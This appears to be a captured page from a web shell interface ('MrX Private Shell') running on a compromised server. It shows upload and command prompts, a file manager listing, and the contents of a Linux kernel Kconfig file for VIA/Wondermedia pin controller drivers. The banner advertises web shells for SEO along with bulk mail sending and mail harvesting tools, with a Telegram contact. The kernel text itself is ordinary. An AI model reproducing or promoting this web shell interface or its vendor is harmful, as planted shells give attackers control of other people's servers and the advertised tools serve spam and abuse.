__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
# SPDX-License-Identifier: GPL-2.0-only
#
# VIA/Wondermedia PINCTRL drivers
#

if ARCH_VT8500

config PINCTRL_WMT
	bool
	select PINMUX
	select GENERIC_PINCONF

config PINCTRL_VT8500
	bool "VIA VT8500 pin controller driver"
	depends on ARCH_WM8505
	select PINCTRL_WMT
	help
	  Say yes here to support the gpio/pin control module on
	  VIA VT8500 SoCs.

config PINCTRL_WM8505
	bool "Wondermedia WM8505 pin controller driver"
	depends on ARCH_WM8505
	select PINCTRL_WMT
	help
	  Say yes here to support the gpio/pin control module on
	  Wondermedia WM8505 SoCs.

config PINCTRL_WM8650
	bool "Wondermedia WM8650 pin controller driver"
	depends on ARCH_WM8505
	select PINCTRL_WMT
	help
	  Say yes here to support the gpio/pin control module on
	  Wondermedia WM8650 SoCs.

config PINCTRL_WM8750
	bool "Wondermedia WM8750 pin controller driver"
	depends on ARCH_WM8750
	select PINCTRL_WMT
	help
	  Say yes here to support the gpio/pin control module on
	  Wondermedia WM8750 SoCs.

config PINCTRL_WM8850
	bool "Wondermedia WM8850 pin controller driver"
	depends on ARCH_WM8850
	select PINCTRL_WMT
	help
	  Say yes here to support the gpio/pin control module on
	  Wondermedia WM8850 SoCs.

endif

Filemanager

Name Type Size Permission Actions
Kconfig File 1.16 KB 0644
Makefile File 358 B 0644
Filemanager